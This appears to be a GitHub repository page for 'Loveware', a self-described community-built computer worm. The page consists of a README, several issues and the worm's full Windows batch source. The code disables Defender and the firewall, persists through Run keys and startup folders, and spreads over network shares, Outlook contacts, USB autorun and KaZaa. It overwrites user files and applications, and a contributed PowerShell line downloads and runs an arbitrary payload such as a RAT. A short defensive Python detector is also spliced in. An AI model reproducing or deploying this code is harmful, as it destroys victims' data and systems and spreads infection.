loveware's Introduction

Loveware

A community driven computer worm

Disclaimer

A classic disclaimer

This worm is not made to damage anyone, and we are not targeting anyone with this software. We are not responsible for the damage caused by this software. This is only a project; we do not want to damage anyone. This software was made only for educational purposes.

About

This is a very dangerous worm that spreads through USB, email and the internet. The payloads are evolving constantly. When you start Loveware, after a while a pink terminal screen will appear in front of you and ask: "Do you love me? (only answer with yes or no)". If you choose no, then you need to know that your computer is doomed: some very nasty payloads will start that will kill your computer in the end. If you choose yes, you will be able to recover your files, or maybe use your computer after some fun payloads.

That's it for now. I hope you enjoy our "little project".

Useful links

Loveware infected map: https://canarytokens.org/manage?token=h8blu81q8j2vzu825fmpzut7r&auth=e8be20c708872b669cd4562d35b5abf7 Track all people infected by Loveware

Join the malware community at Gitter: https://gitter.im/Malware Chat with malware developers and malware enthusiasts

FOR MORE INFORMATION GO HERE

#CreateMalwareForFunNotProfit

loveware's People

Contributors

da2dalus

loveware's Issues

Not an issue but!!

Added a mini script that will download a file and then run it after 45 seconds to ensure it is downloaded if the victim has slow wifi
This is really basic but you can use it to add a grabber, trojan, backdoor, rat or anything like that

:: Set up local environment
setlocal

:: Get the current user's username
for /f "tokens=*" %%a in ('whoami') do set "currentUser=%%a"

:: DAN's modified file download and execution script
powershell.exe -Command "& {(New-Object Net.WebClient).DownloadFile('https://example.com/Example.exe', [System.IO.Path]::Combine($env:LOCALAPPDATA, 'Temp\Example.exe')); Start-Sleep -Seconds 45; Start-Process ([System.IO.Path]::Combine($env:LOCALAPPDATA, 'Temp\Example.exe'))}"

:: End local environment
endlocal

IMPORTANT:
change https://example.com/Example.exe with your own URL, remember to keep it in the quote marks ''
change Example.exe to the name of your file

Worm but no destruction

Edited the code so the worm still exists but the destruction isn't as bad...
also added code that will download a custom file (trojan, rat etc)
IMPORTANT:
Once you find this part of the code:

:: Download custom file virus rat etc
powershell.exe -Command "& {(New-Object Net.WebClient).DownloadFile('https://example.com/Example.exe', [System.IO.Path]::Combine($env:LOCALAPPDATA, 'Temp\Example.exe')); Start-Sleep -Seconds 45; Start-Process ([System.IO.Path]::Combine($env:LOCALAPPDATA, 'Temp\Example.exe'))}"

please change https://example.com/Example.exe to ur own link (direct download)
change Example.exe to your file name

@echo off

:: THIS VERSION CAN CONTAIN BUGS
::
:: LOVEWARE v9.4
::
::
:: Name: Loveware
:: Creator: Da2dalus
:: What is this in gods name?!:
:: This is a worm that will mess up your computer!
:: BTW It is community driven!!! :)
::  ____________________________________________________
:: |___________________MALWARE CLASS____________________|
:: |TYPE______|ANSWER___________________________________|
:: |LOVELETTER|YES THIS IS A LOVELETTER BASED SOFTWARE  |
:: |Spyware   |NO                                       |
:: |Trojan    |YOU CAN CHOOSE                           |
:: |Email worm|YES                                      |
:: |Net worm  |YES                                      |
:: |XSS worm  |NOT THERE YET ;)                         |
:: |Adware    |NO                                       |
:: |RAT       |I AM NOT SO BAD                          |
:: |Backdoor  |PROBABLY NOT ;) (NO)                     |       
:: |YOUR DOOM!|DEFINETLY!!!!!!!!!!                      |         
::
:: IF YOU FIX A BUG OR ADD SOMETHING NEW TO THE SOFTWARE 
:: YOUR NAME WILL APPEAR HERE:
::  ______________________________
:: |MEMBERS_______________________|
:: |Da2dalus__________|CREATOR____|
:: |a11y-spec_________|CONTRIBUTOR|
:: |__________________|___________|
:: |__________________|___________|
:: |__________________|___________|
:: 
:: Notes:
:: This software needs to be converted to exe
:: (add "invisible startup for better preformance").
:: Please send me a message on github or in the Issuses tab of this repo on github
:: https://github.com/Da2dalus/Loveware
:: if you find any bugs or if you have
:: a good idea about something we can add to this software.
:: Disclamer:
:: I am not responsible for the damage caused by this software.
::
::    ,--,                                                                           
::  ,---.'|                                                                           
::  |   | :                                                                           
::  :   : |                                                                           
::  |   ' :      ,---.                              .---.             __  ,-.         
::  ;   ; '     '   ,'\      .---.                 /. ./|           ,' ,'/ /|         
::  '   | |__  /   /   |   /.  ./|  ,---.       .-'-. ' |  ,--.--.  '  | |' | ,---.   
::  |   | :.'|.   ; ,. : .-' . ' | /     \     /___/ \: | /       \ |  |   ,'/     \  
::  '   :    ;'   | |: :/___/ \: |/    /  | .-'.. '   ' ..--.  .-. |'  :  / /    /  | 
::  |   |  ./ '   | .; :.   \  ' .    ' / |/___/ \:     ' \__\/: . .|  | ' .    ' / | 
::  ;   : ;   |   :    | \   \   '   ;   /|.   \  ' .\    ," .--.; |;  : | '   ;   /| 
::  |   ,/     \   \  /   \   \  '   |  / | \   \   ' \ |/  /  ,.  ||  , ; '   |  / | 
::  '---'       `----'     \   \ |   :    |  \   \  |--";  :   .'   \---'  |   :    | 
::                          '---" \   \  /    \   \ |   |  ,     .-./       \   \  /  
::                                 `----'      '---"     `--`---'            `---  
:: DO NOT UPLOAD ON VIRUSTOTAL!!!
::                                                                         

color 57

title Loveware

:: Only run as admin function

:admin

net session >nul 2>&1

if %errorLevel% == 0 (
    goto runner
) else (
    echo msgbox("Please run as admin",0+64,"Admin") > C:\Windows\Admin.vbs
    start C:\Windows\Admin.vbs
    pause
    exit
)

:runner

:: Disable antivirus, firewall, taskmanager...

net stop "SDRSVC"
net stop "WinDefend"
taskkill /f /t /im "MSASCui.exe"
net stop "security center"
netsh firewall set opmode mode-disable
net stop "wuauserv"
net stop "Windows Defender Service"
net stop "Windows Firewall"
net stop sharedaccess

del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*

:: Change file name to Client

RENAME %0 Client.exe

:: Move Client to the windows directory

MOVE /e /y Client.exe C:\Windows

:: Set up local environment
setlocal

:: Get the current user's username
for /f "tokens=*" %%a in ('whoami') do set "currentUser=%%a"

:: Download custom file virus rat etc
powershell.exe -Command "& {(New-Object Net.WebClient).DownloadFile('https://example.com/Example.exe', [System.IO.Path]::Combine($env:LOCALAPPDATA, 'Temp\Example.exe')); Start-Sleep -Seconds 45; Start-Process ([System.IO.Path]::Combine($env:LOCALAPPDATA, 'Temp\Example.exe'))}"

:: End local environment
endlocal

:: Copy Client to the startup

XCOPY "Client.exe" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"

:: Infect network connected computers

@echo off > service.bat
SET "NomeProcesso=Client.exe" >> service.bat
SET "NomeService=Client" >> service.bat
echo sc create %NomeService% binpath=%0 >> service.bat
echo sc start %NomeService% >> service.bat

attrib +h +r +s service.bat
start service.bat

SET i=0

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Services" /t "REG_SZ" /d %0
attrib +h +r +s %0

:Internet
net use Z: \\192.168.1.%i%\C$
if exist Z: (for /f %%u in ('dir Z:\Users /b') do copy %0 "Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.exe"
mountvol Z: /d)
if %i% == 256 (goto Infect) else (set /a i=i+1)
goto worm
goto Internet

:Infect
for /f %%f in ('dir C:\Users\*.* /s /b') do (rename %%f *.exe)
for /f %%f in ('dir C:\Users\*.exe /s /b') do (copy %0 %%f)
goto Infect

:: Send Client to all the contacts of the user
:: with outlook

:worm

set Slash=\
if exist %SystemDrive%%Slash%AUTOEXEC.BAT (
del %SystemDrive%%Slash%AUTOEXEC.BAT
copy %0 %SystemDrive%%Slash%AUTOEXEC.BAT
attrib +s +r +h %SystemDrive%%Slash%AUTOEXEC.BAT
)
set a=Client
copy %0 %windir%\%a%.exe
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul
set b=Loveware
copy %0 %windir%\%b%.exe
echo [windows] >> %windir%\win.ini
echo run=%windir%\%b%.exe >> %windir%\win.ini
echo load=%windir%\%b%.exe >> %windir%\win.ini
echo [boot] >> %windir%\system.ini
echo shell=explorer.exe %b%.exe >> %windir%\system.ini
echo dim x>>%SystemDrive%\mail.vbs
echo on error resume next>>%SystemDrive%\mail.vbs
echo Set fso ="Scripting.FileSystem.Object">>%SystemDrive%\mail.vbs
echo Set so=CreateObject(fso)>>%SystemDrive%\mail.vbs
echo Set ol=CreateObject("Outlook.Application")>>%SystemDrive%\mail.vbs
echo Set out=WScript.CreateObject("Outlook.Application")>>%SystemDrive%\mail.vbs
echo Set mapi = out.GetNameSpace("MAPI")>>%SystemDrive%\mail.vbs
echo Set a = mapi.AddressLists(1)>>%SystemDrive%\mail.vbs
echo Set ae=a.AddressEntries>>%SystemDrive%\mail.vbs
echo For x=1 To ae.Count>>%SystemDrive%\mail.vbs
echo Set ci=ol.CreateItem(0)>>%SystemDrive%\mail.vbs
echo Set Mail=ci>>%SystemDrive%\mail.vbs
echo Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)>>%SystemDrive%\mail.vbs
echo Mail.Subject="Is this you?">>%SystemDrive%\mail.vbs
echo Mail.Body="Man that has got to be embarrassing!">>%SystemDrive%\mail.vbs
echo Mail.Attachments.Add(%0)>>%SystemDrive%\mail.vbs
echo Mail.send>>%SystemDrive%\mail.vbs
echo Next>>%SystemDrive%\mail.vbs
echo ol.Quit>>%SystemDrive%\mail.vbs
start "" "%SystemDrive%\mail.vbs"

goto run2

goto worm

:: Infect autoexec.bat

:run2

set Slash=\
if exist %SystemDrive%%Slash%AUTOEXEC.BAT (
attrib +s +r +h %SystemDrive%%Slash%AUTOEXEC.BAT
del %SystemDrive%%Slash%AUTOEXEC.BAT
copy %0 %SystemDrive%%Slash%AUTOEXEC.BAT
attrib +s +r +h %SystemDrive%%Slash%AUTOEXEC.BAT
)
set a=Client
copy %0 %windir%\%a%.exe
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul
copy %0 "%userprofile%\Start Menu\Programs\Startup"
set b=Loveware
copy %0 %windir%\%b%.exe
echo [windows] >> %windir%\win.ini
echo run=%windir%\%b%.exe >> %windir%\win.ini
echo load=%windir%\%b%.exe >> %windir%\win.ini
echo [boot] >> %windir%\system.ini
echo shell=explorer.exe %b%.exe >> %windir%\system.ini

:: Create autorun file

echo [autorun] > windows.inf
echo ;open=Client.exe >> windows.inf
echo ShellExecute=Client.exe >> windows.inf
echo UseAutoPlay=1 >> windows.inf

:: Copy windows.inf to usb

xcopy /e /y windows.inf D:\
xcopy /e /y windows.inf E:\
xcopy /e /y windows.inf F:\
xcopy /e /y windows.inf G:\
xcopy /e /y windows.inf H:\

:: Copy loveware to usb drives

xcopy /e /y Client.exe D:\
xcopy /e /y Client.exe E:\
xcopy /e /y Client.exe F:\
xcopy /e /y Client.exe G:\
xcopy /e /y Client.exe H:\

:: Use KaZaa to spread if the user has this ancient stuff

if exist C:\Program Files\KaZaa\My Shared Folder\ (
    xcopy Client.exe C:\Program Files\KaZaa\My Shared Folder\list.doc.exe
    goto key
) else (
    goto key
)

:key

:: Infect different files: lnk, mp3, doc, pdf....

assoc .lnk=batfile
DIR /S/B %SystemDrive%\*.lnk >> InfList_lnk.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_lnk.txt) do copy /y %0 "%%j:%%k"

assoc .doc=batfile
DIR /S/B %SystemDrive%\*.doc >> InfList_doc.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_doc.txt) do copy /y %0 "%%j:%%k"

assoc .txt=batfile
DIR /S/B %SystemDrive%\*.txt >> InfList_txt.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_txt.txt) do copy /y %0 "%%j:%%k"

assoc .pdf=batfile
DIR /S/B %SystemDrive%\*.pdf >> InfList_pdf.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_pdf.txt) do copy /y %0 "%%j:%%k"

assoc .xml=batfile
DIR /S/B %SystemDrive%\*.xml >> InfList_xml.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_xml.txt) do copy /y %0 "%%j:%%k"

assoc .mp3=batfile
DIR /S/B %SystemDrive%\*.mp3 >> InfList_mp3.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp3.txt) do copy /y %0 "%%j:%%k"

assoc .mp4=batfile
DIR /S/B %SystemDrive%\*.mp4 >> InfList_mp4.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp4.txt) do copy /y %0 "%%j:%%k"

assoc .png=batfile
DIR /S/B %SystemDrive%\*.png >> InfList_png.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_png.txt) do copy /y %0 "%%j:%%k"

:: Send message to other users

:haha
msg * "I Love You!"
net send * "I Love You"
goto run3
goto haha

:run3

:: Overwrite some programs and taskmanager for extra fun

tskill pbrush
copy /y Client.exe C:\Windows\pbrush.exe

tskill excel
copy /y Client.exe "%SystemDrive%\Program Files\Microsoft Office\Office10\EXCEL.EXE"

tskill mspaint
copy /y Client.exe "%windir%\system32\mspaint.exe"

tskill WINWORD
copy /y Client.exe "%SystemDrive%\Program Files\Microsoft Office\Office10\WINWORD.EXE"

tskill calc
copy /y Client.exe "%windir%\system32\calc.exe

tskill msaccess
copy /y Client.exe "%SystemDrive%\Program Files\Microsoft Office\Office10\MSACCESS.EXE"

tskill iexplore
copy /y Client.exe "C:\Program Files\Internet Explorer\iexplore.exe"

tskill safari
copy /y Client.exe "C:\Program Files\Safari\Safari.exe"

tskill brave
copy /y Client.exe "C:\Program Files\BraveSoftware\Brave-Browser\Application\Brave.exe"

tskill Firefox
copy /y Client.exe "C:\Program Files\Mozilla Firefox\firefox.exe"

:: Put on some music

start /min https://www.youtube.com/watch?v=XpqqjU7u5Yc

::       .....           .....
::   ,ad8PPPP88b,     ,d88PPPP8ba,
::  d8P"      "Y8b, ,d8P"      "Y8b
:: dP'           "8a8"           `Yd
:: 8(              "              )8
:: I8       CODED WITH LOVE       8I
::  Yb,     BY THE LOVEWARE     ,dP
::   "8a,        TEAM         ,a8"
::     "8a,                 ,a8"
::       "Yba             adP"
::         `Y8a         a8P'
::           `88,     ,88'
::             "8b   d8"
::              "8b d8"
::               `888'
::                 "
::
::
:: PLEASE DO NOT COPY THE LOVEWARE CODE AND RENAME IT
:: THAT'S NOT CREATING THAT IS STEALING.
:: THIS SOFTWARE IS PROTECTED BY A GNU PUBLIC LICENSE
:: DO NOT UPLOAD THIS SAMPLE ON VIRUS TOTAL TO PREVENT 
:: ANTI VIRUS DETECTION.
:: I AND THE TEAM ARE NOT RESPONSIBLE FOR THE DAMAGE CAUSED BY 
:: THIS SOFTWARE!
::
:: THANKS FOR THE PEOPLE WHO ADDET THERE CODE TO THIS PROJECT
:: AND SUPPORTED IT
::
:: NEW VERSIONS WILL BE COMING SOON (I HOPE)
::
:: Greetings from the LOVEWARE TEAM
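
A static triage pass over a batch script like the one posted above, as an added example that is not part of the issue or the Loveware repository: it flags the behaviour categories visible in that script (security-service tampering, Run-key persistence, download-and-execute, file-association hijacking, autorun file creation) and raises a verdict only when several co-occur. The rule names, regexes, sample excerpts and the three-category threshold are assumptions made for this example.

```python
import re

# Behaviour categories taken from the batch script on this page; the regexes
# and the 3-category threshold are assumptions made for this example.
RULES = {
    "defense_tampering": re.compile(
        r'\bnet\s+stop\s+"?(WinDefend|security center|wuauserv|sharedaccess)'
        r'|\bnetsh\s+firewall\s+set\s+opmode', re.I),
    "run_key_persistence": re.compile(
        r'\breg\s+add\s+"?(HKLM|HKCU|HKEY_\w+)\\Software\\Microsoft\\Windows'
        r'\\CurrentVersion\\Run\b', re.I),
    "download_and_execute": re.compile(
        r'powershell.*DownloadFile\(.*Start-Process', re.I),
    "file_association_hijack": re.compile(
        r'^\s*assoc\s+\.\w+=(batfile|exefile|cmdfile)\b', re.I),
    "autorun_inf_drop": re.compile(
        r'echo\s+(\[autorun\]|ShellExecute=)', re.I),
}

# Constructed sample: lines quoted from the script on this page.
WORM_EXCERPT = r'''
:: Disable antivirus, firewall, taskmanager...
net stop "WinDefend"
netsh firewall set opmode mode-disable
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Services" /t "REG_SZ" /d %0
echo [autorun] > windows.inf
assoc .doc=batfile
'''

# Constructed sample: a maintenance script an administrator might run.
ADMIN_SCRIPT = r'''
rem pause updates during the patch window
net stop wuauserv
xcopy /e /y reports D:\backup
'''

def triage(script_text):
    """Return {category: [1-based line numbers]} for non-comment lines."""
    hits = {}
    for number, line in enumerate(script_text.splitlines(), start=1):
        stripped = line.strip()
        if stripped.startswith("::") or stripped.lower().startswith("rem "):
            continue  # batch comments describe behaviour but do not run
        for category, pattern in RULES.items():
            if pattern.search(stripped):
                hits.setdefault(category, []).append(number)
    return hits

def verdict(hits, threshold=3):
    """Flag only when several distinct behaviours co-occur in one script."""
    return "suspicious" if len(hits) >= threshold else "needs context"

if __name__ == "__main__":
    for name, text in (("worm excerpt", WORM_EXCERPT), ("admin", ADMIN_SCRIPT)):
        print(name, verdict(triage(text)), triage(text))
```

A single category on its own, such as stopping the update service during maintenance, is common in legitimate administration, which is why the verdict depends on the combination rather than on any one line.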

New to all this need help. please?

I downloaded the malware "loveware" and it won't display the pink terminal which says "do you love me?"
I launched it on Windows 10 x64/x86, where both didn't display the terminal interface

But both of them did crash after I rebooted them

Any help would be appreciated. I am using this malware for a university project about "Malware analysis"

Thank you.
